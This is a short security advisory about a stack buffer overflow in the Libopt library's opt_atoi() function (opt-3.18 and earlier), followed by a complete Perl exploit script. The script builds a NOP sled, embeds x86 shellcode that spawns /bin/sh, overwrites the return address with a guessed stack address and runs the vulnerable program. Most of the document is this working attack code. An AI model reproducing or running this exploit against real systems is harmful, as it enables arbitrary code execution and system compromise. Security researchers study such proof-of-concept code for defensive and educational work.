63 lines
No EOL
2.2 KiB
Perl
Executable file
63 lines
No EOL
2.2 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/7433/info
|
|
|
|
Libopt library has been reported prone to a buffer overflow vulnerability.
|
|
|
|
It has been reported that several Libopt.a error logging functions, may be prone to buffer overflow vulnerabilities when handling excessive data. The data may be supplied as an argument to a program linked to the vulnerable library. This condition arises from a lack of sufficient bounds checking performed on the user-supplied data, before it is copied into a memory buffer. As a result the bounds of an internal stack-based memory buffer may be overflowed and adjacent memory corrupted with attacker supplied data. It should be noted that no SUID applications linked to this library are currently known.
|
|
|
|
Although unconfirmed this vulnerability may be exploited to execute arbitrary attacker supplied code.
|
|
|
|
It should be noted that although this vulnerability was reported to affect Libopt.a version 3.18 previous versions might also be affected.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing
|
|
# Tool shared library opt-3.18 and prior) for this vulnerable code.
|
|
#
|
|
# vuln.c :
|
|
# main(int *argc, char **argv)
|
|
# {
|
|
# /* use OPT opt_atoi() */
|
|
# int y = opt_atoi(argv[1]);
|
|
# printf("opt_atoi(): %i\n", y);
|
|
# }
|
|
#
|
|
# cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
|
|
#
|
|
# Author :
|
|
# jlanthea [contact@jlanthea.net]
|
|
#
|
|
# Syntax :
|
|
# perl expl-optatoi.pl <offset> # works for me with offset = -1090
|
|
|
|
|
|
$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
|
|
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
|
|
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
|
|
"\xff\xff/bin/sh";
|
|
|
|
|
|
$len = 1032; # The length needed to own EIP.
|
|
$ret = 0xbffff6c0; # The stack pointer at crash time
|
|
$nop = "\x90"; # x86 NOP
|
|
$offset = 0; # Default offset to try.
|
|
|
|
|
|
if (@ARGV == 1) {
|
|
$offset = $ARGV[0];
|
|
}
|
|
|
|
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
|
|
$buffer .= $nop;
|
|
}
|
|
|
|
$buffer .= $shellcode;
|
|
|
|
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
|
|
|
|
$new_ret = pack('l', ($ret + $offset));
|
|
|
|
for ($i += length($shellcode); $i < $len; $i += 4) {
|
|
$buffer .= $new_ret;
|
|
}
|
|
|
|
exec("/path/to/vuln $buffer"); |